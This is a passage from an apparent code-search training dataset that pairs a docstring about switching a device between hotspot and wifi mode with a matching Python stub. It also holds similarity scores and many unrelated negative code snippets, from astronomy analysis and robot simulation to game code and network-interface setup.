phased_ltcube=j(tempdir,'phased_ltcube.fits')\n# phase_ltcube(ltcube,phased_ltcube, phase=phase)\n phased_ltcube=ltcube\n from uw.like.pointspec import DataSpecification\n data_specification = DataSpecification(\n ft1files = phased_ft1,\n ft2files = ft2,\n ltcube = phased_ltcube,\n binfile = binfile)\n\n spectral_analysis = SpectralAnalysis(data_specification,\n binsperdec = 4,\n emin = 100,\n emax = 100000,\n irf = \"P6_V3_DIFFUSE\",\n roi_dir = center,\n maxROI = maxroi,\n minROI = maxroi)\n\n if model == None :\n roi=spectral_analysis.roi(\n roi_dir=center,\n diffuse_sources=get_default_diffuse(diffdir=e(\"$FERMI/diffuse\"),\n gfile=\"gll_iem_v02.fit\",\n ifile=\"isotropic_iem_v02.txt\"),\n catalogs = catalog,\n phase_factor = 1.0,\n fit_emin = [emin,emin],\n fit_emax = [emax,emax],\n **kwargs)\n else :\n roi=spectral_analysis.roi(\n roi_dir=center,\n xmlfile = model,\n phase_factor =1.0,\n fit_emin = [emin,emin],\n fit_emax = [emax,emax],\n **kwargs)\n\n print \"---------------------Energy range--------------------\"\n \n print \"emin=\"+str(roi.bands[0].emin)+\"\\n\"\n print \"emax=\"+str(roi.bands[len(roi.bands)-1].emax)+\"\\n\"\n \n\n # keep overall flux of catalog source,\n # but change the starting index to 2.\n roi.modify(which=catalog_name, name=name, index=2, \n keep_old_flux=True)\n\n return roi", "def step(self, action):\n if not hasattr(self, \"robot\"):\n raise RuntimeError(\"reset before step!!!\")\n\n control_miniBox(self.robot.robot, instruction=action, target_velocity=self.target_velocity,\n multiply=self.multiply, left_wheel_joint_index=self.left_wheel_joint_index,\n right_wheel_joint_index=self.right_wheel_joint_index, max_force=self.max_force, \n physicsClientId=self._physics_client_id)\n \n p.stepSimulation(physicsClientId=self._physics_client_id) \n self.step_num += 1\n state = self.robot.get_observation(self.target_pos)\n reward = self.__reward_func(state)\n if state[-2] < self.target_radius:\n done = True\n elif self.step_num > self.done_step_num:\n done = True\n else:\n done = False\n info = {\"distance\" : state[-2], \"collision_num\" : self.collision_num}\n\n # under evaluate mode, extra debug items need to be rendered\n if self._evaluate:\n froms, tos, results = rayTest(self.robot.robot, ray_length=self.laser_length, ray_num=self.laser_num)\n for index, result in enumerate(results):\n self.rayDebugLineIds[index] = p.addUserDebugLine(\n lineFromXYZ=froms[index], \n lineToXYZ=tos[index] if result[0] == -1 else result[3], \n lineColorRGB=self.miss_color if result[0] == -1 else self.hit_color, \n lineWidth=self.ray_debug_line_width, \n replaceItemUniqueId=self.rayDebugLineIds[index]\n )\n\n return np.array(state), reward, done, info", "def create_simulation_box(Lx,Ly,Lz,nmol,molname,vdwradius,boxfilename, topfilename=None):\n\n os.system('gmx insert-molecules \\\n -box %s %s %s \\\n -nmol %s \\\n -ci %s.pdb \\\n -radius %s \\\n -o %s &> out.log'%(Lx,Ly,Lz,nmol,molname,vdwradius,boxfilename))\n\n \n # Actual nmol added\n with open('out.log', 'r') as f:\n for line in f:\n if 'Added' in line:\n nmol = int(line.split()[1])\n \n # read <molname>.top\n with open('%s.top'%molname, 'r') as f:\n data = ''\n for line in f:\n if len(line.split())!=0 and line.split()[0]=='%s'%molname:\n data+='%s'%molname + ' '*(9-len(molname)) + '%s\\n'%nmol\n else:\n data+=line\n \n if topfilename==None:\n # Update number of PA molecules in <molname>.top file \n with open('%s.top'%molname, 'w') as f:\n f.write(data)\n else:\n # Create <newtopfilename> file \n with open('%s'%topfilename, 'w') as f:\n f.write(data)", "def inject_planet(self,data, psf_library, c_ratio=[0.01, 0.1], x_bound=[4, 61], y_bound=[4, 61], no_blend=False):\n\n image = data.copy()\n pl_num = np.random.randint(1, high=4)\n pos_label = np.zeros([64, 64])\n used_xy = np.array([])\n c_prior = np.linspace(c_ratio[0], c_ratio[1], 100)\n if x_bound[0] < 4 or x_bound[0] > 61:\n raise Exception(\"current method only injects whole psf\")\n if y_bound[0] < 4 or y_bound[0] > 61:\n raise Exception(\"current method only injects whole psf\")\n\n for num in range(pl_num):\n while True:\n np.random.shuffle(c_prior)\n psf_idx = np.random.randint(0, high=psf_library.shape[0])\n Nx = np.random.randint(x_bound[0], high=x_bound[1])\n Ny = np.random.randint(y_bound[0], high=y_bound[1])\n if len(used_xy) == 0:\n pass\n else:\n if no_blend:\n if np.any(dist([Nx, Ny], used_xy) < 3):\n pass\n else:\n if np.any(np.array([Nx, Ny]) == used_xy):\n pass\n if dist([Nx, Ny], (32.5, 32.5)) < 4:\n pass\n else:\n planet_psf = psf_library[psf_idx]\n brightness_f = c_prior[0] * np.max(image) / np.max(planet_psf)\n image[Ny - 4:Ny + 3, Nx - 4:Nx + 3] += planet_psf * brightness_f\n used_xy = np.append(used_xy, [Nx, Ny]).reshape(-1, 2)\n pos_label[Ny - 4:Ny + 3, Nx - 4:Nx + 3] = 1\n break\n return image, pos_label", "def roll_out(self, t):\n global potted_stripes, potted_solids\n if (self.potted == True) and (self.vx != 0.0):\n\n self.x += self.vx * t\n v_norm = np.sqrt(self.vx ** 2 + self.vy ** 2)\n self.phi = t * v_norm / self.radius\n\n # Here we save the rotation of the ball\n glPushMatrix()\n glLoadIdentity()\n\n if v_norm > 0.0:\n glRotatef(self.phi * 180.0 / np.pi, -self.vy / v_norm, self.vx / v_norm, 0.0)\n glMultMatrixd(self.matrix)\n glGetDoublev(GL_MODELVIEW_MATRIX, self.matrix)\n\n glPopMatrix()\n\n if (self.number > 8) and (self.vx < 0.0) and (self.x <= 1440 + potted_stripes * (np.pi * self.radius)) and (self.visible == False):\n self.vx = 0.0\n self.x = 1440 + potted_stripes * (np.pi * self.radius)\n potted_stripes += 1\n\n if (self.number <= 8) and (self.number > 0) and (self.vx > 0.0) and (self.x >= 1300 - potted_solids * (np.pi * self.radius)) and (self.visible == False):\n self.vx = 0.0\n self.x = 1300 - potted_solids * (np.pi * self.radius)\n potted_solids += 1", "def create_human_box(self, i):\n self.box = self.detections[0, 0, i, 3:7] * np.array([self.w, self.h, self.w, self.h])\n (self.startX, self.startY, self.endX, self.endY) = self.box.astype(\"int\")", "async def philo(self, context):\n\n await random_image(context, 'philo')", "def draw(self, screen):\n screen.blit(self.image, (self.rect.x, self.rect.y))\n if self.boss.treasureCaptured:\n screen.blit(pygame.transform.scale(self.image, (7, 7)), (self.rect.x + self.boss.width -4, self.rect.y - 15))", "def test_fly_to_mouse_position(verify_image_cache, sphere):\n pl = pyvista.Plotter()\n pl.add_mesh(sphere)\n pl.show(auto_close=False)\n width, height = pl.window_size\n cpos_before = pl.camera_position\n pl.iren._mouse_move(width - width // 4, height // 2)\n pl.fly_to_mouse_position()\n assert cpos_before != pl.camera_position\n pl.close()", "def test_if_mario_is_falling(self):\n self.mario.rect.y += 1\n test_collide_group = pygame.sprite.Group(self.ground_step_pipe_group)\n\n self.mario.rect.y -= 1", "def goalControl(state, powerControl):\n return shoot(state, powerControl)", "def hesitant_action(self):\n if not self.agent.done:\n if not self.opponenet.done:\n self.EV = self.opponenet.pumps - np.random.randint(1,5)\n else:\n if self.opponenet.cashed:\n self.EV = self.opponenet.pumps + 1\n elif self.opponenet.popped:\n if not self.stopCount:\n if self.agent.pumps == 0:\n self.EV = np.random.randint(1,10)\n else:\n self.EV = self.agent.pumps\n self.stopCount = True\n self.action_gating()", "def fire_smelter(self):\n # Get the smelter\n screenshot = utils.take_screenshot()\n forge = screenshot[152:168, 168:184]\n\n # Check if the cold forge exists\n result = cv2.matchTemplate(forge, self.cold_forge_template, cv2.TM_CCORR_NORMED)\n max_val = cv2.minMaxLoc(result)[1]\n\n # Found cold forge, light it and wait\n if max_val > 0.9:\n pyautogui.moveTo(192, 159, 0.15)\n pyautogui.doubleClick()\n sleep(1.5)", "def step(self, action):\n\n # determine if gripper could grasp the ObjectToPickUp\n gripperR = action[0].astype(np.float64)\n gripperPhi = action[1].astype(np.float64)\n\n # # for testing purposes\n # gripperR = 0.1\n # gripperPhi = self.winkel[self.stepcount]\n # self.stepcount += 1\n\n self.gripper.place(gripperR, gripperPhi)\n\n logging.debug(\"moving arm to position: [{0} {1}]\".format(gripperR, gripperPhi))\n logging.debug(\"box position: [{0} {1} {2}]\".format(self.box.pos[0], self.box.pos[1], self.box.phi))\n\n reward, graspSuccess = self.calculateReward()\n logging.debug(\"received reward: \" + str(reward))\n\n # re-place object to pick up if grasp was successful\n # if(graspSuccess):\n self.box.place(randomPlacement=True)\n\n # get depth image\n image = self.kinect.getImage(self.box, filter=False, flattenImage=self.flattenImage, saveImage=True)\n\n self.state = image\n done = True\n info = {}\n\n return self.state, reward, done, info", "def _SerialShootGameHurt(self, taskPB, taskVal):\n taskPB.nTaskID = self._GetValueFromDict(taskVal, 'taskID')\n taskPB.eType = gameregProtoc_pb2.TYPE_SHOOTHURT\n # taskPB.nSkipFrame = self._GetValueFromDict(taskVal, 'skipFrame')\n\n for element in self._GetValueFromDict(taskVal, 'elements'):\n elementPB = taskPB.stPBAgentTaskElements.add()\n\n rect = elementPB.stPBRect\n self._SerialRect(rect, self._GetValueFromDict(element, 'ROI'))\n\n elementPB.fThreshold = self._GetValueFromDict(element, 'threshold')" ]
[ "0.6883019", "0.60247976", "0.5729917", "0.5662367", "0.5657805", "0.56022036", "0.5602087", "0.55716115", "0.5532589", "0.5502499", "0.5473831", "0.54660267", "0.54527724", "0.54423535", "0.5430135", "0.5401244", "0.5400176", "0.53518057", "0.53516215", "0.53498757", "0.5337529", "0.53322077", "0.5329076", "0.53124714", "0.5286162", "0.52783287", "0.5278177", "0.523128", "0.52156144", "0.52107227", "0.5206619", "0.5187274", "0.51793456", "0.51743937", "0.5171074", "0.51613307", "0.515808", "0.51381403", "0.5127301", "0.51189893", "0.5111322", "0.51113117", "0.5098409", "0.5096037", "0.5093395", "0.5090522", "0.50848174", "0.50807905", "0.5076153", "0.50684416", "0.5067889", "0.5067217", "0.5059826", "0.50588363", "0.5058114", "0.5051044", "0.50377613", "0.5036234", "0.50340104", "0.5023296", "0.5020437", "0.5019894", "0.4988065", "0.49848914", "0.49792257", "0.49767885", "0.49753058", "0.49623987", "0.49569786", "0.49558154", "0.49555737", "0.4950926", "0.4947333", "0.49398792", "0.4932968", "0.49278995", "0.49273473", "0.49262607", "0.49199155", "0.49189088", "0.4916471", "0.4912448", "0.49052048", "0.490455", "0.49037242", "0.490186", "0.48976868", "0.489527", "0.48949003", "0.48938626", "0.48817968", "0.48814943", "0.4872637", "0.48719978", "0.48706776", "0.48660603", "0.48637837", "0.48606348", "0.4857047", "0.48564142" ]
0.72881216
0
Test base.py GSObjects for notequals.
def test_ne(): # Define some universal gsps gsp = galsim.GSParams(maxk_threshold=1.1e-3, folding_threshold=5.1e-3) # Pixel. Params include scale, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.Pixel(scale=1.0), galsim.Pixel(scale=1.1), galsim.Pixel(scale=1.0, flux=1.1), galsim.Pixel(scale=1.0, gsparams=gsp)] all_obj_diff(gals) # Box. Params include width, height, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.Box(width=1.0, height=1.0), galsim.Box(width=1.1, height=1.0), galsim.Box(width=1.0, height=1.1), galsim.Box(width=1.0, height=1.0, flux=1.1), galsim.Box(width=1.0, height=1.0, gsparams=gsp)] all_obj_diff(gals) # TopHat. Params include radius, flux, gsparams. # gsparams. # The following should all test unequal: gals = [galsim.TopHat(radius=1.0), galsim.TopHat(radius=1.1), galsim.TopHat(radius=1.0, flux=1.1), galsim.TopHat(radius=1.0, gsparams=gsp)] all_obj_diff(gals)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_not_equal_on_equal(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def test_not_equal_on_not_equal_value(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_b, enums.OpaqueDataType.NONE)\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_equal_on_not_equal_value(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_b, enums.OpaqueDataType.NONE)\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def test_ne(self):\n dummy = DummyCryptographicObject()\n self.assertFalse(dummy != dummy)", "def test_not_equal(self):\n x = Point(\n lat=24.4,\n lng=23.1,\n author=self.u\n )\n self.assertFalse(self.a == x)\n self.assertTrue(self.a != x)", "def test_nonEquality(self):\n # Make explicitly sure we're using !=:\n self.assertFalse(Comparable(1) != Comparable(1))\n self.assertTrue(Comparable(2) != Comparable(1))", "def __ne__(self, obj):\r\n return assert_(self.obj != obj, '%r == %r' % (self.obj, obj))", "def test_equality_check_against_other_object_doesnt_raise_exception(self):\n test_object = Vec3(1, 2, 3)\n self.assertFalse(test_object == Quat(1, 2, 3, 4))\n self.assertFalse(Quat(1, 2, 3, 4) == test_object)\n self.assertTrue(test_object != Quat(1, 2, 3, 4))\n self.assertTrue(Quat(1, 2, 3, 4) != test_object)", "def test_not_equal(self):\n test1 = self.Test({ 'id': 1, 'name': 'Poop Head' })\n test2 = self.Test({ 'id': 1, 'name': 'Poop Head!' })\n self.assertNotEqual(test1, test2)", "def test_not_equal_on_equal_and_empty(self):\n a = Digest()\n b = Digest()\n\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def __ne__(self, G):\n return not self.__eq__(G)", "def test_notImplementedNotEquals(self):\n self.assertEqual(Comparable(1).__ne__(object()), NotImplemented)", "def test_eq_false(self):\n self.assertFalse(self.instance == Commit('f3ccd0b70fe758b539c28319735d9a6489c0fb10'))", "def test_not_equal_on_not_equal_data_type(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b.opaque_type = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_not_equal_on_not_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest()\n c = Digest(\n hashing_algorithm=self.hashing_algorithm_d,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_c)\n d = Digest(\n key_format_type=self.key_format_type_c)\n\n self.assertTrue(a != b)\n self.assertTrue(b != a)\n self.assertTrue(b != c)\n self.assertTrue(b != d)", "def test_notImplementedEquals(self):\n self.assertEqual(Comparable(1).__eq__(object()), NotImplemented)", "def test_not_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def test_eq_false_type(self):\n other = Sample(self.sample_id, SampleTemplate(1))\n self.assertFalse(self.tester == other)", "def __ne__(self, other: object) -> bool:\n return not self.__eq__(other)", "def __ne__(self, obj):\n return not self.__eq__(obj)", "def testEquality(self):\n pass", "def test_not_equal(self):\n utils.compare_tracing_methods(\n SimpleCompareOpsModule(\"notEqual\"),\n torch.randn(3, 4, 5),\n torch.randn(3, 4, 5),\n fusible_ops={\"aten::ne\"},\n )", "def __ne__(self, other):\n return not (self == other) # opposite of __eq__", "def __neq__(self, other): \n return not self == other", "def test_equal_on_not_equal_data_type(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b.opaque_type = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def test_not_equal_on_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n\n self.assertFalse(a != b)\n self.assertFalse(b != a)", "def __ne__(self, other: object) -> bool:\n if self.__eq__(other):\n return False\n return True", "def test_neq():\n # Test for not equal special method with scalar Rnode object and float value\n x = Rnode(2.0)\n try:\n assert (x != 2) == False\n assert (x != 1) == True\n except AssertionError as e:\n print(e)\n raise AssertionError\n\n # Test for equality special method with two scalar Dual object\n x = Rnode(2.0)\n y = Rnode(2.0)\n z = Rnode(1.0)\n try:\n assert (x != y) == False\n assert (x != z) == True\n except AssertionError as e:\n print(e)\n raise AssertionError", "def __ne__(self, other):\n return not (self == other) # opposite of __eq__", "def test_equal_on_not_equal(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = Digest()\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self == other", "def __ne__(self,other):\n return not (self == other)", "def __ne__(self: _TT, other: object) -> bool:\n return self.ne(other) # type: ignore", "def test_eq_false_type(self):\n other = PrepSample(self.sample_id, PrepTemplate(1))\n self.assertFalse(self.tester == other)", "def test_not_eq(self):\n st_1 = State(substance=\"water\", T=Q_(400.0, \"K\"), p=Q_(101325.0, \"Pa\"))\n st_2 = State(substance=\"water\", T=Q_(300.0, \"K\"), p=Q_(101325.0, \"Pa\"))\n assert not st_1 == st_2", "def test_equal_on_equal(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n self.assertTrue(a == b)\n self.assertTrue(b == a)", "def __ne__(self, other):\n return not(self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not self == other", "def test_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __ne__(self, other):\r\n return not (self == other)", "def test_not_equal_same_reference():\n v = Vector(1.0)\n assert_false(v != v)", "def test_unequality(self):\n self.assertFalse(Record(1, 2) != Record(1, 2))\n self.assertTrue(Record(1, 2) != Record(1, 3))\n self.assertTrue(Record(1, 2) != Record(2, 2))\n self.assertTrue(Record(1, 2) != Record(3, 4))", "def __ne__(self, other):\n return not self == other", "def __ne__(self, other):\n return not self == other", "def test_eq(self):\n dummy = DummyCryptographicObject()\n self.assertTrue(dummy == dummy)", "def __ne__(self, other):\n return not_equal(self, other)", "def test_not_equal(self):\n p1 = make_package(filename=\"foobar\")\n p2 = make_package(filename=\"foo\")\n self.assertNotEqual(hash(p1), hash(p2))\n self.assertNotEqual(p1, p2)", "def test_equal_on_equal_and_empty(self):\n a = Digest()\n b = Digest()\n\n self.assertTrue(a == b)\n self.assertTrue(b == a)", "def __ne__(self, other):\n pass", "def __ne__(self, other):\r\n return not self == other", "def __ne__(self, other):\r\n return not self == other", "def __ne__(self, other):\n if not isinstance(other, StorageEnclosureAllOf):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self,other):\n return not self == other", "def test_eq_false_id(self):\n other = Sample('1.SKD8.640184', self.sample_template)\n self.assertFalse(self.tester == other)", "def test_differentClassesInequality(self):\n self.assertTrue(Record(1, 2) != DifferentRecord(1, 2))", "def __ne__(self, other):\n if not isinstance(other, ComputingCore):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, oth):\n return int(self) == oth", "def test_almost_equal(self):\n x = Point(\n lat=23.4,\n lng=23.1,\n author=self.u\n )\n self.assertTrue(self.a == x)\n self.assertFalse(self.a != x)", "def __ne__(self, other):\n return super().__eq__(other)", "def __ne__(self, other):\n if not isinstance(other, V1beta1ObjectiveSpec):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\n if not isinstance(other, GraphicField):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)" ]
[ "0.74571276", "0.73648274", "0.73306084", "0.72958326", "0.7260039", "0.72194594", "0.7127766", "0.70569617", "0.7055979", "0.7028425", "0.70240885", "0.7012719", "0.6914279", "0.68538886", "0.68433744", "0.6823976", "0.6806015", "0.6802378", "0.6794009", "0.675546", "0.6751178", "0.6749799", "0.6749393", "0.67392707", "0.6717619", "0.6699802", "0.6687567", "0.66858983", "0.66744435", "0.66558033", "0.66283274", "0.66117424", "0.6604382", "0.6600236", "0.65757626", "0.6569656", "0.65640706", "0.65627897", "0.65549684", "0.65549684", "0.65549684", "0.6532829", "0.6518747", "0.65075916", "0.6503658", "0.65000325", "0.64988124", "0.64988124", "0.6497821", "0.6495444", "0.64896613", "0.6473168", "0.64719963", "0.6467854", "0.6467854", "0.6466305", "0.6466204", "0.6466204", "0.6466204", "0.6466204", "0.6456128", "0.64447016", "0.6443302", "0.6425077", "0.64174575", "0.64169556", "0.64121", "0.6389829", "0.6386101", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6378944", "0.6378944", "0.6378944", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395" ]
0.0
-1
Decide whether to enter hotspot mode or wifi mode and then do so
def set_wifi_mode(args): pass """+ try: if args['mode'] == 'hotspot': logger.info('will enter hotspot mode') #TODO - Need to capture the line that contains interface [some lan id] and uncomment it. change_file_line(path.join('/etc', 'dhcpcd.conf'), interface_l1_res, 'interface {}\n'.format() return True if args['silent'] else 'Ok' if args['mode'] == 'wi-fi': logger.info('will enter wi-fi mode') return True if args['silent'] else 'Ok' else: logger.error('Unknown wi-fi mode: {}'.format(args['mode'])) return False if args['silent'] else 'ERROR' except: logger.error('Exception in set_wifi_mode: {}, {}'.format(exc_info()[0], exc_info()[1])) return False if args['silent'] else 'ERROR' """
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _cycle_wifi(mode=None):\n call(['ifdown', settings.WIFI_INTERFACE])\n if mode is not None:\n call(['iwconfig', settings.WIFI_INTERFACE, 'mode', mode])\n call(['ifup', settings.WIFI_INTERFACE])", "def switch_network(self,type = None):\n network_type = self.appconfig(type,\"Settings\")\n self.logger.debug(\"Switch network to %s:%s.\" % (type,network_type))\n if self.enter_settings(u\"More…\"):\n if self.device(text=\"Mobile networks\").exists:\n self.device(text=\"Mobile networks\").click()\n if self.device(text=\"Preferred network mode\").wait.exists(timeout=self.timeout):\n self.device(text=\"Preferred network mode\").click()\n if self.device(resourceId=\"android:id/buttonPanel\").wait.exists(timeout=self.timeout):\n self.device(text=network_type).click()\n print self._is_connected(type)\n self.back_to_home()", "def system(self, mode=None):\n if mode == System.AUTO:\n self.change_request[\"SystemSwitch\"] = System.AUTO\n elif mode == System.COOL:\n self.change_request[\"SystemSwitch\"] = System.COOL\n elif mode == System.HEAT:\n self.change_request[\"SystemSwitch\"] = System.HEAT\n elif mode == System.OFF:\n self.change_request[\"SystemSwitch\"] = System.OFF\n else:\n return False\n return self.change_request[\"SystemSwitch\"]", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def _setup_wifi_ap(self):\n context = self._get_ap_context()\n try:\n check_output(['ifconfig', context['hostname']])\n logger.info('wifi ap {} already setup'.format(context['hostname']))\n return True\n except CalledProcessError:\n logger.info('Setting up virtual access point interface')\n call(['service', 'hostapd', 'stop'])\n call(['service', 'dnsmasq', 'stop'])\n\n self._write_system_template('/etc/dnsmasq.conf', 'access_point/dnsmasq.conf')\n self._write_system_template('/etc/hostapd/hostapd.conf', 'access_point/hostapd.conf', context)\n self._write_system_template('/etc/network/interfaces', 'access_point/interfaces.conf', context)\n self._write_system_template('/etc/default/hostapd', 'access_point/default_hostapd.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'access_point/dhcpcd.conf', context)\n \n call(['systemctl', 'enable', 'hostapd', ])\n call(['systemctl', 'enable', 'dnsmasq', ])\n return True", "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def set_monitor_mode(controller_name):\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"down\"])\n subprocess.run([\"airmon-ng\", \"check\", \"kill\"])\n subprocess.run([\"iw\", wifi_name, \"set\", \"monitor\", \"none\"])\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"up\"])", "def connect_type(word_list):\n if 'wlan0' in word_list or 'wlan1' in word_list:\n con_type = 'wifi'\n elif 'eth0' in word_list:\n con_type = 'ethernet'\n else:\n con_type = 'current'\n\n return con_type", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def test_wifi_scanner_with_wifi_off(self):\n self.log.debug(\"Make sure wifi is off.\")\n wutils.wifi_toggle_state(self.dut, False)\n self.start_wifi_scanner_single_scan_expect_failure(\n self.default_scan_setting)\n self.log.debug(\"Turning wifi back on.\")\n wutils.wifi_toggle_state(self.dut, True)", "def createWIFIAccessPoint():\n ifname = config.get(\"interface\", \"wifi\")\n ipaddress = config.get(\"hotspot\", \"ip\")\n prefix = int(config.get(\"hotspot\", \"prefix\"))\n ssid = config.get(\"hotspot\", \"ssid\")\n password = config.get(\"hotspot\", \"password\")\n ################################\n s_wifi = dbus.Dictionary(\n {\n \"ssid\": dbus.ByteArray(ssid.encode(\"utf-8\")),\n \"mode\": \"ap\",\n })\n s_wsec = dbus.Dictionary(\n {\n \"key-mgmt\": \"wpa-psk\",\n \"psk\": password\n })\n s_con = dbus.Dictionary(\n {\"type\": \"802-11-wireless\",\n \"interface-name\":ifname ,\n \"uuid\": str(uuid.uuid4()),\n \"id\": ssid,\n \"autoconnect\":dbus.Boolean(True)\n })\n addr1 = dbus.Dictionary({\"address\": ipaddress, \"prefix\": dbus.UInt32(prefix)})\n dns = []\n s_ip4 = dbus.Dictionary(\n {\n \"address-data\": dbus.Array([addr1], signature=dbus.Signature(\"a{sv}\")),\n \"dns\": dbus.Array(dns, signature=dbus.Signature('u'), variant_level=1),\n \"method\": \"manual\",\n })\n s_ip6 = dbus.Dictionary({\"method\": \"ignore\"})\n con = dbus.Dictionary(\n {\n \"802-11-wireless\": s_wifi,\n \"802-11-wireless-security\":s_wsec,\n \"connection\": s_con,\n \"ipv4\": s_ip4,\n \"ipv6\": s_ip6\n 